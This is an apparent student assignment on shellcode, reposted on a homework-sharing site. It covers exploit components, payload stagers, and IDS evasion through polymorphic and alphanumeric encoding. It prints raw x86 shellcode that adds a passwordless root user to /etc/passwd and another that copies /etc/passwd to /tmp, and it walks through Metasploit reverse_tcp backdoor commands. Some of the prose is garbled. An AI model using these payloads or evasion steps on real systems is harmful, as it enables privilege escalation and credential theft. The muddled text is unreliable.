Your All-in-One AI-Powered Toolkit for Academic Success.

+13062052269

info@desklib.com

Available 24*7 on WhatsApp / Email

Company

Tools

Support

Use of Shellcode in Digital Forensics

Verified

Added on 2023/06/09

AI Summary

This article discusses the concept of shellcode, its development bottom-line, components of an exploitation attack, bypassing an intrusion detection system, program counter and its importance for an attacker, and advantages of using alphanumeric encoding engines for shellcodes. It also provides a shellcode to ask for username and user password twice and explains the commands used in the demo. The article concludes with a comparison of different types of shellcodes.

Contribute Materials

Your contribution can guide someone’s learning journey. Share your documents today.

Running head: USE OF SHELLCODE IN DIGITAL FORENSICS
Use of Shellcode in Digital Forensics
Name of the Student
Name of the University
Authors note

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

💎 Get Pro

2USE OF SHELLCODE IN DIGITAL FORENSICS
Overview of shellcode
Shellcode can be defined as an arrangement of directions for the processor infused
and after that executed by an exploited program. Shellcode is utilized to specifically control
registers and the usefulness of a compromised application program [4]. shell codes can be
composed in high level programming languages but in some certain scenarios or states state
dialect yet would tell they may not work as intended, so low level assembly language is
favoured for shellcode generation.
Part A
Development bottom-line of an exploit and explanations of three
components
For any exploitation the bottom line of an attack can be listed as the severity of the
flaws in the application or network gateway that is going to be exploited [4]. The impact of
any exploitation based attack depends on the successful exploitation of the found
vulnerability. With a detailed vulnerability scanning of the targeted machine or the
application can help in the successful completion of the exploitation attack.
The main three components of any exploitation attack are listed as the vector used
for the attack, technique used for the exploitation and lastly the payload determined for the
attack.
Attack vector: An attack vector is considered as the technique or means for a hacker
through which the attacker can have access to some targeted computer or some targeted
network. In this way the attacker delivers some specific payload or malicious code segment.
Use of the attack vectors helps the attacker/hackers in order to exploit scanned vulnerabilities
of a system or network server.

3USE OF SHELLCODE IN DIGITAL FORENSICS
These attack vectors include shellcodes, e-mail attachments, viruses, pop-up
windows, chat rooms, instant messages and so on. Most of these used vectors are software
components or, in some cases hardware components. In this exploitation attacks, the users are
deceived by exploiting the system vulnerabilities by using the different components such as
shellcode.
Up to some extent, antivirus applications/firewalls applications are able to block some
of the attack vectors from getting into the system or network [5]. For exploitation attack A
defence method which considered as effective for some time but may not remain effective for
always. The reason behind this can be stated as the attackers constantly changing and
updating vectors using new techniques in order to gain unauthorized access to targeted
servers, networks or workstations inside the network.
Technique used for exploitation:
Payload for the attack: Exploit payload is the functional component for any exploitation
based attack. Usually for any kind of attack payloads includes bind, reverse shells or the
meterpreter shell. Payload in the exploitation attack refers to the part of virus/malware or any
cyber worm which is mainly responsible for the completion of malicious action on the victim
machine/network.
There are three types payloads that are used in the attacks. These are Stagers, Stages and
singles.
Stagers: This kind of payloads are small in size and are mainly intended establish
communication among the victim machine and attacker machine. After establishing the
communication, the process moves to next stage. Established communication channel
between the attacker and target machine is very reliable. This kind payload is helpful for the

4USE OF SHELLCODE IN DIGITAL FORENSICS
attackers to re-use the codes developed for an attack [1]. The reason behind this reusability is
separation of the establishment of the communication channel from actual attacking stage.
Stages: This type of payload modules are downloaded by the Stagers part. As the Stager
takes care of communication channel the Stages payloads are often larger in size while
having various options for delivering the payload and carrying out the option.
Single: These type of payload is self-contained but they are not connected to any other
module. The main intention behind these payloads is establishing communications among
the victim machine and attacker machine using Metasploit [3].
Exploitation technique: The attack algorithm is known as the exploitation technique used
for the vulnerable exploitation attack.
Explanation of the way of bypassing an intrusion detection system
Most of intrusion detection systems are dependent on the pre-defined signatures of
different malwares, shell codes or viruses [4]. In order evade the IDS or the intrusion
detection systems one of the best and popular methods are use of polymorphic shell codes.
Polymorphism is a strategy to transform the malicious code to be represented in different
manner unique each time it is run, yet despite everything it works in the same manner in
which it may have done before the transformation.
With the use of polymorphism, attackers avoid the detection process of IDS since they
try to get a match with the predefined signatures which does not match for a shellcode after
its transformation [1]. Polymorphic engines are utilized to make a polymorphic shellcode.

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

💎 Try AI Paraphraser

5USE OF SHELLCODE IN DIGITAL FORENSICS
Concept of program counter and its importance for an attacker
In computing technology, the program counter can be defined as a special kind of the
register that keeps track of the next instruction of an application that is going to be executed
by the processing unit.
Both data and application instructions have a memory address on the memory of the
system. This data and instructions are fetched from the memory location by the program
counter and consecutively are executed by the processing unit.
At any certain point when some instruction is executed by the processing unit the
concerned application refreshes the program counter with the following directions deliver
that will be fetched from memory and executed next in turn [4]. In the following stage
program counter sends the data to memory address enlist as a piece of execution cycle. Along
these lines program counter raises value of the instruction counter by one for the following
activity.
The attackers can exploit any vulnerability of the targeted machine or server through
the control flow hijacking process [2]. In this process the attacker gains controls over the
program counter and can redirect the flow of execution of instructions in such a way that the
flow of the control so that it can help in desired action by the targeted machine or server.
Two advantages of using alphanumeric encoding engines for shellcodes
Following are the advantages of the using alphanumeric engine for generating
shellcode compared to any other engine.
i. In order to begin with the advantages, alphanumeric shellcodes generated
using the alpha numeric engine can be saved in generally unsuspected context

6USE OF SHELLCODE IN DIGITAL FORENSICS
and atypical format for example, use of valid directory and file name or client
passwords for a system. Moreover, the alphanumeric character set is
essentially smaller when compared to the characters accessible in UTF-8 and
Unicode encoding formats [2]. This implies that the shellcodes forming with
the alphanumeric shellcode is very less when compared to the ordinary
shellcode that are injected to the application or network.
ii. Use of the shell codes generated using the alphanumeric engines helps in
avoiding the monitoring tools (intrusion prevention system and intrusion
detection system) [5]. As this tools detects the malware or worms depending
upon certain signatures and the shellcodes from alphanumeric shellcode lacks
those signatures thus leading to failure to detect the shellcode.
Part B
The shellcode to ask for username and user password twice
\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\x8B
\x0D\x00\x00\x00\x00\xBA\x13\x00\x00\x00\xCD
\x80\xB8\x03\x00\x00\x00\xBB\x01\x00\x00\x00\x8B
\x0D\x00\x00\x00\x00\xBA\x17\x00\x00\x00\xCD\x80
\xB8\x04\x00\x00\x00\xBB\x01\x00\x00\x00\x8B\x0D
\x00\x00\x00\x00\xBA\x17\x00\x00\x00\xB8\x01\x00\
x00\x00\xBB\x00\x00\x00\x00\xCD\x80

7USE OF SHELLCODE IN DIGITAL FORENSICS
Shellcode 1
\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68
\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x66
\xb9\x01\x04\xcd\x80\x89\xc3\x6a\x04\x58\x31\xd2
\x52\x68\x30\x3a\x3a\x3a\x68\x3a\x3a\x30\x3a\x68
\x72\x30\x30\x74\x89\xe1\x6a\x0c\x5a\xcd\x80\x6a
\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80
Identification: Above shellcode is helpful in creating a root privileged user in the
Linux system with the user name r00t without any password. The new data is saved in
/etc/passwd directory.
Shellcode 2
\x31\xc0\xb0\x05\x31\xc9\x51\x68\x73\x73\x77\x64
\x68\x63\x2f\x70\x61\x68\x2f\x2f\x65\x74\x8d\x5c
\x24\x01\xcd\x80\x89\xc3\xb0\x03\x89\xe7\x89\xf9
\x66\x6a\xff\x5a\xcd\x80\x89\xc6\x6a\x05\x58\x31
\xc9\x51\x68\x66\x69\x6c\x65\x68\x2f\x6f\x75\x74
\x68\x2f\x74\x6d\x70\x89\xe3\xb1\x42\x66\x68\xa4
\x01\x5a\xcd\x80\x89\xc3\x6a\x04\x58\x89\xf9\x89
\xf2\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x05\xcd

Secure Best Marks with AI Grader

Need help grading? Try our AI Grader for instant feedback on your assignments.

💎 Get Pro

8USE OF SHELLCODE IN DIGITAL FORENSICS
\x80
Identification: The given shellcode is helpful for the attacker’s in copying all the data
from the /etc/passwd directory to the /tmp/outfile. In this way the attacker can have better
accessibility to all the user account as the password data is stored in the outfile which can be
exploited by the attacker.
Part C
Explanation of the commands used in the demo
The first command which is used is “msfconsole” which is used for getting into any
metasploit console. After that “show exploit” commands are there which is used for available
exploits from any kind of machine hacking.
In the provided attack, “metasploit/multi/ handler” is used by attacker for create and
establishing connection to victim machine. After that “set PAYLOAD
windows/meterpreter/reverse_tcp” is used for setting payload for the attack. The following
command “msfvenom –p windows/meterpreter/reverse_tcp LHOST address” is used
between victim and attacker which is mainly assigned to specific ports which are carryout as
per the payload. In this whole mechanism or process LHOST is taken to be IP address of the
given machine. Since both the given network works in same network, then it is likely that
target machine to reach out of the given attacker mechanism to work in the same given
network. The next step or stage in this SET LPORT: in the port the victim machine gets
attack when target has established a connection with the machine [4]. The next stage is
backdoor file that window machine can be achieve by enclosing it with proper password and
message.
Shellcode used in the demo

9USE OF SHELLCODE IN DIGITAL FORENSICS
For the provided attack the reverse shell code can be used for exploiting the target.
Reverse shell a type of shell in which target machine is convey back to the attacking
machine. Attacking machine comes ups with a port with which it is associated and it utilizes
various kinds of execution which needs to completed.
Various types of Shellcode and its comparison
There are large number of methods which are used for generation of shellcode. A list
has been provided like:
PWNtools: It is considered to be an essential part of CFT framework. This type of
Shellcodes is used for exploiting the development library for any given framework. This
particular tool is developed by the help of Python language. It is developed in such a way that
is can provide rapid development along with prototyping [2]. It mainly comes up with many
features or benefits but it is only used in the generation of shellcode. This particular module
aims in development of assembly code which can be achieved by NASM which makes use of
python language [1]. PWNtools does need any attacker to have an idea regarding the
assembly to create shell. Different application provides tools which is helpful to write
shellcodes in much better and faster way.
NASM: It is considered as the most basic kind of approach which is helpful in
generation of Shellcodes. It aims in creation of shellcode which is achieved by assembly
code.
Shellforge: It is developed by the help of Python language and comes up with ability
to develop shellcodes by the help of C programming language.
Synesthesia approach: Compared to other approaches, thus approach is most recent
one. This approach includes the following restrictions that makes the shellcodes more capable

10USE OF SHELLCODE IN DIGITAL FORENSICS
of hiding from the different monitoring tools [3]. The limitations of this approach are
provided below;
No NULL bytes are allowed in the shellcode, used every ASCII letter converted to the
uppercase. In order to make the shellcode more reliable and this technique uses format string
Using the “%” character dicey.
All the bytes in the shell code must be printable (as well as Bytes must be alphanumeric) for
escaping the IDS.
Use of msfvenom: Another approach that is popular in generating the shell codes is use of
msfvenom available from the metasploit platform. Shellcodes developed in this approach
includes only ASCII characters used in the exploitation.
Comparison
The benefit of this solution is that we have not write by anything. We have make use
of shellcodes which are predefined for any platforms. For NASM, the biggest disadvantage is
that the tool is not useful for generation of any shellcode for other platforms like android.
Polymorphic Shellcode
It is a well-known technique which mainly encodes a shellcode and responsible for
any kind of exploitation vulnerability into polymorphism structure. It is shellcode which is
indicated by the given marks. Polymorphism is considered to be the best technique for the
above situation [5]. An attacker can easily scramble or pack the given shellcode and then
after that it prepend a proper bit code which is decompressed in the given adventure. As the
mark for shellcode cannot be reflected in the given polymorphic frame, then IPS can easily
fail to figure out.

Paraphrase This Document

Need a fresh take? Get an instant paraphrase of this document with our AI Paraphraser

💎 Try AI Paraphraser

11USE OF SHELLCODE IN DIGITAL FORENSICS
References
[1] J. Mason, S. Small, F. Monrose and G. MacManus, “English shellcode.” ,
In Proceedings of the 16th ACM conference on Computer and communications security . pp.
524-533, 2009.
[2]T. Cheng, Y. Lin, Y. Lai and P. Lin, "Evasion Techniques: Sneaking through Your
Intrusion Detection/Prevention Systems", IEEE Communications Surveys & Tutorials, vol.
14, no. 4, pp. 1011-1020, 2012.
[3]K. Iwamoto and K. Wasaki, "A Method for Shellcode Extractionfrom Malicious
Document Files Using Entropy and Emulation", International Journal of Engineering and
Technology, vol. 8, no. 2, pp. 101-106, 2016.
[4]T. Okamoto, "SecondDEP: Resilient Computing that Prevents Shellcode Execution
in Cyber-Attacks", Procedia Computer Science, vol. 60, pp. 691-699, 2015.
[5]M. Chen, C. Hu, D. Tian, X. Wang, Y. Liu and N. Li, "Shellix: An Efficient
Approach for Shellcode Detection", International Journal of Security and Its Applications,
vol. 10, no. 6, pp. 107-122, 2016.
[6]T. Lu, L. Zhang and Y. Fu, "A Novel Immune-Inspired Shellcode Detection
Algorithm Based on Hyperellipsoid Detectors", Security and Communication Networks, vol.
2018, pp. 1-10, 2018.
[7]I. Arce, "The shellcode generation", IEEE Security & Privacy Magazine, vol. 2,
no. 5, pp. 72-76, 2004.

12USE OF SHELLCODE IN DIGITAL FORENSICS

1 out of 12

+13062052269

info@desklib.com

Use of Shellcode in Digital Forensics

Contribute Materials

Secure Best Marks with AI Grader

Paraphrase This Document

Secure Best Marks with AI Grader

Paraphrase This Document

Related Documents

Advanced Digital Forensics: Shellcode, Exploits, and Intrusion Detection

Understanding Attackers and Shellcode for Cybersecurity

Metasploit Framework Assignment PDF

Shellcode in Cybersecurity Answer 2022

Heartbleed Vulnerability Analysis

CVE-2017-0144 Vulnerability and EternalBlue Exploit: Risk Assessment and Preventative Measures